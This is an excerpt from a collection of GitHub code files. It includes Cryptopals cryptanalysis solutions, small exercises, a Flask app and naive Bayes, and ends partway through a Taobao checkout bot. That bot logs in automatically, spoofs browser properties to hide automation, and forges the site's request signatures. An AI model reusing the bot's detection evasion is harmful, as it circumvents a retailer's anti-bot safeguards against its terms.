truncate them to a common length (the length of the smallest ciphertext will work).\n\n Solve the resulting concatenation of ciphertexts as if for repeating- key XOR, with a key size of the length of\n the ciphertext you XOR'd.\n \"\"\"\n key = cryptopals.generate_random_bytes(16)\n nonce = 0\n\n with open(\"data/20.txt\", \"r\") as handle:\n lines = [binascii.a2b_base64(line.strip()) for line in handle.readlines()]\n crypts = [cryptopals.aes_with_custom_ctr(line, key, nonce) for line in lines]\n\n # min_length = len(max(crypts, key=len))\n blocks = [crypt for crypt in crypts]\n\n transposed = cryptopals.transpose(blocks)\n\n # check each index for possible hits\n # if more than one hit -- check for score.\n\n keys = {}\n for index, block in enumerate(transposed):\n keys[index] = []\n for guess in range(255):\n items = [(item ^ guess) for item in block]\n count = [\n item\n for item in items\n if chr(item) in (string.ascii_letters + \" ,.'?:-;\")\n ]\n # if index == 10:\n # print(len(items), len(count), [chr(item) for item in items])\n\n keys[index].append([len(count), bytes([guess])])\n\n key = []\n for index in keys:\n key.append(max(keys[index], key=lambda x: x[0])[1])\n\n result = b\"\".join(key)\n print(result)\n\n for block in blocks:\n print(cryptopals.decrypt_xor(block, result))\n\n\n@time_it\ndef challenge_21():\n \"\"\"\n Implement the MT19937 Mersenne Twister RNG\n - https://en.wikipedia.org/wiki/Mersenne_Twister\n :return:\n \"\"\"\n\n x = cryptopals.MT19337(90210)\n\n assert x.extract_number() == 826079627\n\n\n@time_it\ndef challenge_22():\n \"\"\"\n - Wait a random number of seconds between, I don't know, 40 and 1000.\n - Seeds the RNG with the current Unix timestamp\n - Waits a random number of seconds again.\n - Returns the first 32 bit output of the RNG.\n :return:\n \"\"\"\n\n current_time = int(time.time())\n\n time.sleep(random.randint(10, 20))\n\n random_number = cryptopals.MT19337(current_time).extract_number()\n\n result = 0\n future_time = int(time.time())\n for index in range(1000):\n temp_time = future_time - index\n test_number = cryptopals.MT19337(temp_time).extract_number()\n if test_number == random_number:\n # print(\"Actual Seed: {}\".format(current_time))\n # print(\"Derived Seed: {} (Found in {} iterations)\".format(temp_time, index+1))\n result = temp_time\n break\n\n assert result == current_time\n\n\ndef challenge_23():\n \"\"\"\n Task: Clone an MT19937 RNG from its output\n\n The internal state of MT19937 consists of 624 32 bit integers.\n\n For each batch of 624 outputs, MT permutes that internal state. By permuting state regularly, MT19937\n achieves a period of 2**19937, which is Big.\n\n Each time MT19937 is tapped, an element of its internal state is subjected to a tempering function that\n diffuses bits through the result.\n\n The tempering function is invertible; you can write an \"untemper\" function that takes an MT19937 output and\n transforms it back into the corresponding element of the MT19937 state array.\n\n ****\n To invert the temper transform, apply the inverse of each of the operations in the temper transform in reverse\n order. There are two kinds of operations in the temper transform each applied twice; one is an XOR against a\n right-shifted value, and the other is an XOR against a left-shifted value AND'd with a magic number. 
So you'll\n need code to invert the \"right\" and the \"left\" operation.\n ***\n\n Once you have \"untemper\" working, create a new MT19937 generator, tap it for 624 outputs, untemper each of them\n to recreate the state of the generator, and splice that state into a new instance of the MT19937 generator.\n\n The new \"spliced\" generator should predict the values of the original.\n \"\"\"\n current_time = int(time.time())\n print(\"Current Time: \", current_time)\n MT = cryptopals.MT19337(current_time)\n random_number = MT.extract_number()\n random_number2 = MT.extract_number()\n print(random_number, random_number2)\n\n untemper = cryptopals.MT19337.untemper(random_number)\n\n print(\"\\n\")\n print(\" seed:\", current_time)\n print(\" tempered:\", random_number)\n print(\" tempered2:\", random_number2)\n print(\"unTempered:\", untemper)\n spliced_mt = cryptopals.MT19337(untemper)\n rn_01 = spliced_mt.extract_number()\n rn_02 = spliced_mt.extract_number()\n\n assert random_number2 == rn_02\n\n pass\n\n\nif __name__ == \"__main__\":\n\n # Set #1\n challenge_01()\n challenge_02()\n challenge_03()\n challenge_04()\n challenge_05()\n challenge_06()\n challenge_07()\n challenge_08()\n\n # set #2\n challenge_09()\n challenge_10()\n challenge_11()\n challenge_12()\n challenge_13()\n challenge_14()\n challenge_15()\n challenge_16()\n\n # set #3\n challenge_17()\n challenge_18()\n challenge_19()\n challenge_20()\n challenge_21()\n\n challenge_22()\n challenge_23()\n","repo_name":"jasonbrackman/matasano_crypto_challenges","sub_path":"challenges.py","file_name":"challenges.py","file_ext":"py","file_size_in_byte":36466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26986823321","text":"while True:\n try:\n line = input(\"Enter a line of char: \")\n l = len(line)\n a=[]\n for c in line:\n if c==\"\\'\":\n a.append(\" \")\n else:\n ab= chr(ord(c) - 7)\n a.append(ab)\n print(\"\".join(a))\n except EOFError:\n break\n","repo_name":"jayed87/UVa-solutions-python","sub_path":"458-the-decoder.py","file_name":"458-the-decoder.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38255550743","text":"#coding:utf-8 \nimport sys \nimport time\nfrom operator import add\nfrom pyspark import SparkContext\nimport os\n# import numpy as np\n# from pyspark.mllib.regression import LabeledPoint\ndef timeline(l):\n s=sorted(l,key=lambda x:x[0],reverse=False)\n re=[]\n for i in s:\n re.append(i[1])\n return re\ndef g2(l):\n s=set()\n for i in l[1]:\n s.add(i[1])\n if len(s)>1:\n return True\n else:\n return False\ndef lis2str(l):\n re=\"\"\n for i in l[0]:\n re+=str(i)+\",\"\n re+=str(l[1])\n return re\ndef change1(l,shape):\n cat=np.zeros(shape)\n l=sorted(l,key=lambda x:x[0],reverse=False)\n temp=\"\"\n count=0\n for i in range(shape):\n if i==0:\n temp=l[i][7]\n else:\n if l[i][7]!=temp and l[i][7]!=\"**\":\n count+=1\n cat[i]=1\n temp=l[i][7]\n temp=cat.tolist()\n temp.append(count)\n return temp\ndef extract_label(l):\n s=set()\n t=[]\n l=sorted(l,key=lambda x:x[0],reverse=False)\n for i in range(5,8):\n s.add(l[i][7])\n if len(s)>1:\n return (\"1\")\n else:\n return (\"0\")\ndef type(l):\n l=sorted(l,key=lambda x:x[0],reverse=False)\n s=set([i[7] for i in l[:6]])\n return len(s)\ndef toline(l):\n line=\"\"\n line+=l[0]\n for i in l[1]:\n line+=\",\"+i\n return line\ndef listadd(l):\n l[1].append(l[0])\n return l[1]\nif __name__ == \"__main__\":\n sc = 
SparkContext(appName=\"PythonWordCount\")\n line = sc.textFile(\"./kesci/user/g*\")\n records=line.map(lambda x:x.split(\",\"))\n records.cache()\n # train=records.filter(lambda x:x[0]<\"201507\")\n good=sc.textFile(\"./kesci/user/effectiveuser.csv\").map(lambda x:(x,1))\n t=records.map(lambda x:(x[1],[x[i] for i in [0,3,4,5,6,7]]))\\\n .groupByKey()\\\n .mapValues(list)\\\n .mapValues(lambda x:sorted(x,key=lambda a:a[0]))\\\n .flatMapValues(lambda x:x)\n # label=records.filter(lambda x:x[0]>\"201505\").map(lambda x:(x[1],x[7]))\\\n # .groupByKey()\\\n # .mapValues(list)\\\n # .mapValues(lambda x:\"1\" if len(set(x))>1 else \"0\")\n t=t.join(good).mapValues(lambda x:x[0]).map(toline)\n # for i in t.take(50):\n # print(i)\n t.coalesce(1).saveAsTextFile(\"./kesci/newraw\")\n # label is commented out above, so only report the count of t\n print(\"******************OK***********************\"+str(t.count()))\n","repo_name":"colinlzh/unicome","sub_path":"getraw.py","file_name":"getraw.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17644461333","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 17 21:46:10 2019\n\n@author: akgill\n\"\"\"\n\nPORTION_DOWN_PAYMENT = 0.25\nTOTAL_COST = 1000000.0\nMONTHS=36\nR=0.04\nSEMI_ANNUAL_RAISE=0.07\n\n\ndef how_much_to_save_monthly():\n starting_salary = float(input(\"Enter your starting salary: \"))\n savings_needed = TOTAL_COST * PORTION_DOWN_PAYMENT\n \n # guesses in units of ten thousandths\n low_guess = 0 # 0.00% monthly savings rate\n high_guess = 10000 # 100.00% monthly savings rate\n \n # Before bisection search, check that it is possible to save enough at 100%\n # savings rate. If not, quit early.\n if (savings(starting_salary, high_guess/10000) < savings_needed):\n print(\"It is not possible to pay the down payment in three years.\")\n return\n \n mid_savings = 0\n steps = 0\n while (abs(mid_savings - savings_needed) > 100):\n steps += 1\n mid_guess = ((high_guess - low_guess) // 2) + low_guess\n mid_savings = savings(starting_salary, mid_guess/10000)\n \n if (mid_savings < savings_needed):\n low_guess = mid_guess\n \n if (mid_savings > savings_needed):\n high_guess = mid_guess \n \n print(\"Best savings rate: \", mid_guess/10000)\n print(\"Steps in bisection search: \", steps)\n\n \ndef savings(annual_salary=0, portion_saved=0):\n current_savings = 0\n for month in range(0, MONTHS):\n current_savings += (annual_salary / 12.0) * portion_saved\n current_savings += current_savings * R / 12.0\n if (month % 6 == 0):\n annual_salary += annual_salary * SEMI_ANNUAL_RAISE\n \n return current_savings","repo_name":"akgill/MIT6_0001","sub_path":"PS1/ps1c.py","file_name":"ps1c.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12652413289","text":"#tagset: Universal Dependencies, since many taggers use exactly this one. 
The text mostly relies on many cross-part-of-speech homonyms.\r\n#collocation patterns: 1) \"не\" + ADJ/ADV/VERB, since it flips the meaning to the antonym, as in \"does not turn on\"/\"not performant\"; 2) ADV + ADJ, which often \r\n#changes the meaning of the words (usually the ADV) in collocations like \"terribly interesting\" and so on, which also clashes with the core semantics of the word \"terribly\";\r\n#3) ADJ + NOUN, to pull out product characteristics such as \"good battery life\"; down the road this could show which characteristics weigh more when a product is picked \r\n#so they can get a larger weight when scoring review sentiment (i.e. a bad case colour, for example, should weigh less than a bad battery)\r\n\r\nimport re\r\nfrom collections import OrderedDict\r\nfrom natasha import (Segmenter,\r\n NewsMorphTagger, NewsEmbedding,\r\n Doc)\r\nimport spacy\r\nfrom sklearn.metrics import accuracy_score\r\nimport pymorphy2\r\n\r\nmorph = pymorphy2.MorphAnalyzer()\r\n\r\nnlp = spacy.load(\"ru_core_news_sm\")\r\n\r\npos_FROM_P = {'NPRO': 'PRON', 'ADVB': 'ADV', 'PRED': 'ADV', 'VERB': 'VERB', 'PNCT': 'PUNCT', 'NOUN': 'NOUN',\r\n 'PREP': 'ADP', 'INFN': 'VERB', 'GRND': 'VERB', 'PRCL': 'PART', 'ADJF': 'ADJ', 'ADJS': 'ADJ',\r\n 'COMP': 'ADJ', 'CONJ': 'CCONJ', 'UNKN': 'X', 'NUMR': 'NUM', 'PRTF': 'VERB'}\r\n\r\n\r\ndef acc(dictio, name):\r\n a = []\r\n b = []\r\n for i in gold.keys():\r\n a.append(gold[i])\r\n b.append(dictio[i])\r\n\r\n print('Accuracy for ' + name + ': ' + str(accuracy_score(b, a)) + '%')\r\n return 0\r\n\r\n\r\nsegmenter = Segmenter()\r\nmorph_tagger = NewsMorphTagger(NewsEmbedding())\r\n\r\ngold = OrderedDict()\r\nslovne = OrderedDict()\r\n\r\nwith open('корпус.txt', 'r', encoding='utf-8') as f:\r\n text = f.read()\r\n\r\nwith open('gold.txt', 'r', encoding='utf-8') as f:\r\n for line in f:\r\n x = re.split('___', re.sub('\\n', '', line))\r\n gold[x[0]] = x[1]\r\n\r\ndoc = Doc(text)\r\ndoc.segment(segmenter)\r\ndoc.tag_morph(morph_tagger)\r\n\r\nfor i in doc.tokens:\r\n x = re.search(\"text='.+?'\", str(i)).group(0)\r\n x = re.sub(\"text='\", '', x)\r\n x = re.sub(\"'\", '', x)\r\n x = x.lower()\r\n y = re.search(\"pos='.+?'\", str(i)).group(0)\r\n y = re.sub(\"pos='\", '', y)\r\n y = re.sub(\"'\", '', y)\r\n slovne[x] = y\r\n\r\nacc(slovne, 'Slovnet')\r\n\r\ndoc = nlp(text)\r\n\r\nspac = OrderedDict()\r\nfor i, s in enumerate(doc.sents): # splits on hyphens, needs a workaround\r\n for t in s:\r\n if t.pos_ != 'SPACE' and t.text != 'какой':\r\n spac[t.text.lower()] = t.pos_\r\n else:\r\n spac['какой-то'] = 'DET'\r\n\r\nacc(spac, 'spaCy')\r\n\r\nwith open('леммы.txt', 'r', encoding='utf-8') as f:\r\n lemma = f.read()\r\n lemmas = lemma.split('\\n')\r\n\r\npymorph = OrderedDict()\r\nfor l in lemmas:\r\n p = morph.parse(l)[0]\r\n if str(p.tag) != 'PNCT':\r\n pymorph[l] = pos_FROM_P[str(p.tag.POS)]\r\n else:\r\n pymorph[l] = pos_FROM_P[str(p.tag)]\r\n\r\na = []\r\nb = []\r\nfor i in gold.keys():\r\n a.append(gold[i])\r\n b.append(pymorph[i])\r\n\r\nacc(pymorph, 'pymorphy2')\r\n","repo_name":"segherz/NLP-hw","sub_path":"3rd year/hw-2.py","file_name":"hw-2.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25599859320","text":"#app/__init__.py\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_api import FlaskAPI\nfrom flask import request, jsonify, abort\nfrom instance.config import app_config\n\n# initialize sql-alchemy\ndb = SQLAlchemy()\n\n#config name refers to development, staging, testing, production\ndef 
crud_app(config_name): \n\n from app.models import Userlist\n\n # run app based on config environment\n app = FlaskAPI(__name__, instance_relative_config=True)\n app.config.from_object(app_config[config_name])\n app.config.from_pyfile('config.py')\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n \n #validate duplicates\n def validate(name, email):\n userlists = Userlist.get_all()\n results = []\n\n for userlist in userlists:\n obj = {\n 'id': userlist.id,\n 'name': userlist.name,\n 'email': userlist.email,\n 'date_created': userlist.date_created,\n 'date_modified': userlist.date_modified\n }\n results.append(obj)\n i = 0\n while i < len(results):\n # a record counts as a duplicate when both name and email already exist\n if results[i]['name'] == name and results[i]['email'] == email:\n return True\n i += 1\n return False\n\n @app.route('/userlists/<int:id>', methods=['GET', 'PUT', 'DELETE'])\n def userlists_edit(id, *kwargs):\n #get userlist using its ID\n userlist= Userlist.query.filter_by(id=id).first()\n if not userlist:\n abort(404)\n \n if request.method == 'DELETE':\n userlist.delete()\n return {\n \"message\": \"user {} deleted successfully\".format(userlist.id)\n }, 200\n\n elif request.method == 'PUT':\n \n name = str(request.data.get('name', ''))\n email = str(request.data.get('email', ''))\n if validate(name, email) != True:\n userlist.name = name\n userlist.email = email\n userlist.save()\n response = jsonify({\n 'id': userlist.id,\n 'name': userlist.name,\n 'email': userlist.email,\n 'date_created': userlist.date_created,\n 'date_modified': userlist.date_modified\n })\n response.status_code = 200\n return response\n else:\n return {\n \"message\": \"user already exists\"\n }, 200\n else:\n response = jsonify({\n 'id': userlist.id,\n 'name': userlist.name,\n 'email': userlist.email,\n 'date_created': userlist.date_created,\n 'date_modified': userlist.date_modified\n })\n response.status_code = 200\n return response\n return app\n\n\n \n \n","repo_name":"rajanazirul/flask-CRUD","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39188690163","text":"import keyboard\nimport time\nimport pyautogui\nimport cv2\nimport numpy as np\nimport winsound\n\ndef is_image_on_screen(template_path):\n # Load the image template you want to search for\n template = cv2.imread(template_path, cv2.IMREAD_GRAYSCALE)\n\n # Take a screenshot of the screen\n screenshot = pyautogui.screenshot()\n\n # Convert the screenshot to a NumPy array\n screenshot = np.array(screenshot)\n\n # Convert the screenshot to grayscale\n screenshot_gray = cv2.cvtColor(screenshot, cv2.COLOR_RGB2GRAY)\n\n # Search for the template within the screenshot\n result = cv2.matchTemplate(screenshot_gray, template, cv2.TM_CCOEFF_NORMED)\n\n # Set a threshold to determine if the template was found\n threshold = 0.8\n location = np.where(result >= threshold)\n\n # If the template was found, return True\n if len(location[0]) > 0:\n return True\n else:\n return False\n\n\ndef has_passed_n_seconds(n, last_time):\n return time.time() - last_time > n\n\n\ndef main():\n\n time_between_beeps = 15 # seconds\n\n hotkey_to_pause_resume = '-'\n\n hotkey_to_quit = '='\n \n # Path to the image template you want to search for\n image = 'photo.png'\n image2 = 'photo2.png'\n\n paused = False\n\n last_beep_time = time.time()\n\n\n print(f\"start\\npress {hotkey_to_pause_resume} to pause\\npress {hotkey_to_quit} to quit\")\n winsound.Beep(660, 200)\n\n while True: # main polling loop\n try: # a try block so that unexpected key events do not raise and crash the loop\n if 
keyboard.is_pressed(hotkey_to_pause_resume): # if key 'q' is pressed \n paused = not paused\n if paused:\n print('Paused')\n winsound.Beep(660, 200)\n else:\n print('Resumed')\n winsound.Beep(660, 200)\n last_beep_time = time.time() # reset last beep time\n time.sleep(0.2)\n \n if keyboard.is_pressed(hotkey_to_quit): \n print('Quit')\n winsound.Beep(880, 300)\n break \n \n if not paused and has_passed_n_seconds(time_between_beeps, last_beep_time) and not is_image_on_screen(image) and not is_image_on_screen(image2):\n # winsound.Beep(660, 400)\n winsound.PlaySound(\"make_vils.wav\", winsound.SND_FILENAME)\n print(\"make villagers\")\n last_beep_time = time.time()\n\n except:\n break\n\n \n\n\nif __name__ == \"__main__\":\n main()","repo_name":"TheMarcosP/vills_warning_script","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25643652463","text":"users = {\n \"Jonathan\": {\n \"twitter\": \"jonnyt\",\n \"lottery_numbers\": [6, 12, 49, 33, 45, 20],\n \"home_town\": \"Stirling\",\n \"pets\": [\n {\n \"name\": \"fluffy\",\n \"species\": \"cat\"\n },\n {\n \"name\": \"fido\",\n \"species\": \"dog\"\n },\n {\n \"name\": \"spike\",\n \"species\": \"dog\"\n }\n ]\n },\n \"Erik\": {\n \"twitter\": \"eriksf\",\n \"lottery_numbers\": [18, 34, 8, 11, 24],\n \"home_town\": \"Linlithgow\",\n \"pets\": [\n {\n \"name\": \"nemo\",\n \"species\": \"fish\"\n },\n {\n \"name\": \"kevin\",\n \"species\": \"fish\"\n },\n {\n \"name\": \"spike\",\n \"species\": \"dog\"\n },\n {\n \"name\": \"rupert\",\n \"species\": \"parrot\"\n }\n ]\n },\n \"Avril\": {\n \"twitter\": \"bridgpally\",\n \"lottery_numbers\": [12, 14, 33, 38, 9, 25],\n \"home_town\": \"Dunbar\",\n \"pets\": [\n {\n \"name\": \"monty\",\n \"species\": \"snake\"\n }\n ]\n }\n}\n\n# 1. Get Jonathan's Twitter handle (i.e. the string `\"jonnyt\"`)\n# 2. Get Erik's hometown\n# 3. Get the array of Erik's lottery numbers\n# 4. Get the species of Avril's pet Monty\n# 5. Get the smallest of Erik's lottery numbers\n# 6. Return an array of Avril's lottery numbers that are even\n# 7. Erik is one lottery number short! Add the number `7` to be included in his lottery numbers\n# 8. Change Erik's hometown to Edinburgh\n# 9. Add a pet dog to Erik called \"Fluffy\"\n# 10. Add another person to the users dictionary\n\nprint(\"\\n\")\nprint(\"Jonathans twitter is: \", users[\"Jonathan\"][\"twitter\"]) # prints Jonathans twitter handle\n\nprint(\"Erik's hometown is: \", users[\"Erik\"][\"home_town\"]) # prints Erik's hometown\n\nprint(\"Erik's Lotto numbers are: \", users[\"Erik\"][\"lottery_numbers\"]) # prints Eriks Lottery numbers\n\navrilPet = users[\"Avril\"][\"pets\"][0][\"species\"] # stores the species of avrilsPet in a new variable\nprint(\"Avrils pet is a: \", avrilPet, \"\\n\") # and prints it\n\nerikLottoList = users[\"Erik\"][\"lottery_numbers\"] # initialises new List containing Eriks lottery no's.\nprint(\"Lowest number in Erik's numbers is: \", min(erikLottoList), \"\\n\") # and prints the lowest number.\n\navrilLottoList = users[\"Avril\"][\"lottery_numbers\"] # initialises new List containing Avrils lottery no's.\navrilEven = [] # initialises empty List \nfor num in avrilLottoList: \n if num % 2 == 0: # for all the items in avrils lottery numbers, IF they divide by 2 with no remainder --\n avrilEven.append(num) # They are EVEN. 
if they are EVEN they are added to the empty List from before.\nprint(\"Avrils EVEN lotto numbers: \", avrilEven, '\\n') # new List is then printed\n\nerikLottoList.append(7) # add no. 7 to Eriks numbers.\nprint(\"Erik has added a number: \", erikLottoList, \"\\n\")\n\nerikHome = users[\"Erik\"][\"home_town\"] = \"Edinburgh\" # new variable = Eriks hometown, which is also being reset to 'Edinburgh'\nprint(\"Erik's new hometown is: \", erikHome, \"\\n\") # new variable then printed\n\nerikPet = users[\"Erik\"][\"pets\"] # new List containing Erik's pets\nerikPet.append({\"name\":\"Fluffy\", \"species\":\"dog\"}) # adding new pet to dictionary within a list within a dictionary within a list within.........\nprint(\"Erik's pets with newly added DOG: \", erikPet, \"\\n\") # Print List of pets to show newly added Dog.\n\nusers[\"Sam\"] = {\"twitter\":\"samS\", \"lottery_numbers\":[1,2,3,4,5,6,7], \"home_town\":\"Linlithgow\", \"pets\":[{\"name\":\"leia\", \"species\":\"dog\"}]}\nfor key, value in users.items() :\n if key == \"Sam\": # new user added above here, all in one line. could be more elegant!\n print (\"New user added: \", key, value) # loop with conditional used to select the new user by KEY then display all values within.\n\n\n\n\n","repo_name":"TeddyBuckshot/day2Homework","sub_path":"exercise_b_users.py","file_name":"exercise_b_users.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2873267896","text":"from functools import reduce\r\n\r\nimport pandas as pd\r\nimport pprint\r\n\r\nclass Classifier():\r\n data = None\r\n class_attr = None\r\n priori = {}\r\n cp = {}\r\n hypothesis = None\r\n\r\n\r\n def __init__(self,filename=None, class_attr=None ):\r\n self.data = pd.read_csv(filename, sep=',', header =(0))\r\n self.class_attr = class_attr\r\n\r\n '''\r\n probability(class) = How many times it appears in column\r\n __________________________________________\r\n count of all class attribute\r\n '''\r\n def calculate_priori(self):\r\n class_values = list(set(self.data[self.class_attr]))\r\n class_data = list(self.data[self.class_attr])\r\n for i in class_values:\r\n self.priori[i] = class_data.count(i)/float(len(class_data))\r\n print (\"Priori Values: \", self.priori)\r\n\r\n '''\r\n Here we calculate the individual probabilities \r\n P(outcome|evidence) = P(Likelihood of Evidence) x Prior prob of outcome\r\n ___________________________________________\r\n P(Evidence)\r\n '''\r\n def get_cp(self, attr, attr_type, class_value):\r\n data_attr = list(self.data[attr])\r\n class_data = list(self.data[self.class_attr])\r\n total = 1\r\n for i in range(0, len(data_attr)):\r\n if class_data[i] == class_value and data_attr[i] == attr_type:\r\n total+=1\r\n return total/float(class_data.count(class_value))\r\n\r\n '''\r\n Here we calculate the Likelihood of Evidence and multiply all individual probabilities with the priori\r\n (Outcome|Multiple Evidence) = P(Evidence1|Outcome) x P(Evidence2|outcome) x ... 
x P(EvidenceN|outcome) x P(Outcome)\r\n scaled by P(Multiple Evidence)\r\n '''\r\n def calculate_conditional_probabilities(self, hypothesis):\r\n for i in self.priori:\r\n self.cp[i] = {}\r\n for j in hypothesis:\r\n self.cp[i].update({ hypothesis[j]: self.get_cp(j, hypothesis[j], i)})\r\n print (\"\\nCalculated Conditional Probabilities: \\n\")\r\n pprint.pprint(self.cp)\r\n\r\n def classify(self):\r\n print (\"Result: \")\r\n for i in self.cp:\r\n print (i, \" ==> \", reduce(lambda x, y: x*y, self.cp[i].values())*self.priori[i])\r\n\r\nif __name__ == \"__main__\":\r\n c = Classifier(filename=\"new_dataset.csv\", class_attr=\"Play\" )\r\n c.calculate_priori()\r\n c.hypothesis = {\"Outlook\":'Rainy', \"Temp\":\"Mild\", \"Humidity\":'Normal' , \"Windy\":'t'}\r\n\r\n c.calculate_conditional_probabilities(c.hypothesis)\r\n c.classify()\r\n","repo_name":"husnainfareed/Simple-Naive-Bayes-Weather-Prediction","sub_path":"bayes.py","file_name":"bayes.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"11470480926","text":"# coding=utf-8\n\nimport asyncio\nimport json\nimport re\nimport time\nfrom datetime import datetime, timedelta\n\nimport execjs\nimport requests\nfrom pyppeteer import launch\n\nfrom conf import buy_time, cart_id, cookies_duration, pw, user\n\nbuy_time = datetime.strptime(buy_time, \"%Y-%m-%d %H:%M:%S.%f\")\n\n\ns = requests.Session()\n\n\n# TODO: re-fetch cookies once they are detected as expired, and fetch cart_id automatically\nasync def get_cookies():\n with open(\"./cookies.json\", \"r\") as f:\n obj = json.load(f)\n ct = datetime.strptime(obj[\"create_time\"], \"%Y-%m-%d %H:%M:%S.%f\")\n if datetime.now() - ct < timedelta(minutes=cookies_duration) and user == obj[\"cookies\"].get(\"tracknick\"):\n return obj[\"cookies\"]\n else:\n try:\n launch_args = {\n \"headless\": False, # headless mode\n \"dumpio\": True, # avoid hanging\n # browser window size; disable the infobar\n \"args\": [\"--windows-size=800,1280\", \"--disable-infobars\"]\n }\n driver = await launch(launch_args)\n page = await driver.newPage()\n await page.setUserAgent(\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\")\n await page.setViewport(viewport={\"width\": 462, \"height\": 824})\n\n # patch navigator properties so the browser is not detected as a bot\n await page.evaluateOnNewDocument(\"() => { Object.defineProperties(navigator, { webdriver: { get: () => false }})}\")\n await page.evaluateOnNewDocument(\"() => { Object.defineProperty(navigator, 'plugins', { get: () => []})}\")\n await page.evaluateOnNewDocument(\"() => { Object.defineProperty(navigator, 'languages', { get: () => ['zh-CN', 'zh']})}\")\n\n await page.goto(\"https://main.m.taobao.com/cart/index.html?\")\n await page.waitFor(\"iframe\")\n iframe = page.frames[1]\n await iframe.type(\"#username\", user, {\"delay\": 100})\n await iframe.type(\"#password\", pw, {\"delay\": 100})\n await iframe.click(\"#btn-submit\")\n await iframe.waitFor(2000)\n\n # check whether a verification dialog appeared\n # vs = await iframe.Jeval(\"div.km-dialog.km-dialog-ios7.km-dialog-alert\", \"node => node.style.visibility\")\n # if vs == \"visible\":\n # await iframe.click(\"div.km-dialog.km-dialog-ios7.km-dialog-alert > div.km-dialog-buttons > span\")\n # await iframe.click(\"#SM_BTN_1\")\n # await iframe.type(\"#password\", pw, {\"delay\": 100})\n # await iframe.click(\"#btn-submit\")\n # wait for the specified element\n await page.waitFor(\"#cart_sticky_fixed_bar\")\n cookies = await page.cookies()\n cookies = {c[\"name\"]: c[\"value\"] for c in cookies}\n await driver.close()\n with 
open(\"./cookies.json\", \"w\") as f:\n obj = {\"create_time\": datetime.now().strftime(\n \"%Y-%m-%d %H:%M:%S.%f\"), \"cookies\": cookies}\n json.dump(obj, f, ensure_ascii=False, indent=4)\n return cookies\n except Exception as e:\n print(e)\n await driver.close()\n raise\n\n\ndef main(cookies):\n # 抢单\n try:\n # 忽略安全警告\n requests.packages.urllib3.disable_warnings()\n # 添加cookies等配置\n cj = requests.utils.cookiejar_from_dict(\n cookies, cookiejar=None, overwrite=True)\n s.cookies = cj\n s.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n s.verify = False\n\n token = cookies[\"_m_h5_tk\"].split(\"_\")[0]\n with open('./s.js') as f:\n js = f.read()\n context = execjs.compile(js)\n # 还剩30秒时,获取一些参数\n order_build_data = None\n while True:\n now = datetime.now()\n if buy_time - now <= timedelta(seconds=30):\n try:\n source_time = str(int(round(time.time(), 3) * 1000))\n data = '{\"isPage\":True,\"extStatus\":0,\"netType\":0,\"exParams\":\"{\\\\\"mergeCombo\\\\\":\\\\\"True\\\\\",\\\\\"version\\\\\":\\\\\"1.1.1\\\\\",\\\\\"globalSell\\\\\":\\\\\"1\\\\\",\\\\\"cartFrom\\\\\":\\\\\"taobao_client\\\\\",\\\\\"spm\\\\\":\\\\\"a2141.7756461.toolbar.i1\\\\\",\\\\\"dataformat\\\\\":\\\\\"dataformat_ultron_h5\\\\\"}\",\"cartFrom\":\"taobao_client\",\"spm\":\"a2141.7756461.toolbar.i1\",\"dataformat\":\"dataformat_ultron_h5\",\"ttid\":\"h5\"}'\n req = s.get(\"https://h5api.m.taobao.com/h5/mtop.trade.query.bag/5.0/?jsv=2.5.6&appKey=12574478&t=%s&sign=%s&api=mtop.trade.query.bag&v=5.0&type=jsonp&ttid=h5&isSec=0&ecode=1&AntiFlood=True&AntiCreep=True&H5Request=True&dataType=jsonp&callback=mtopjsonp2&data=%s\" %\n (source_time, context.call(\"s\", token + \"&\" + source_time + \"&12574478&\" + data), data))\n query_bag_data = json.loads(\n re.match(\".*?({.*}).*\", req.text, re.S).group(1))[\"data\"]\n # 防止请求过快\n time.sleep(5)\n source_time = str(int(round(time.time(), 3) * 1000))\n data = '{\"buyNow\":\"false\",\"buyParam\":\"%s\",\"spm\":\"a21202.12579950.settlement-bar.0\",\"exParams\":\"{\\\\\"tradeProtocolFeatures\\\\\":\\\\\"5\\\\\",\\\\\"userAgent\\\\\":\\\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36\\\\\"}\"}' % query_bag_data[\n \"data\"][\"item_\" + cart_id][\"fields\"][\"settlement\"]\n req = 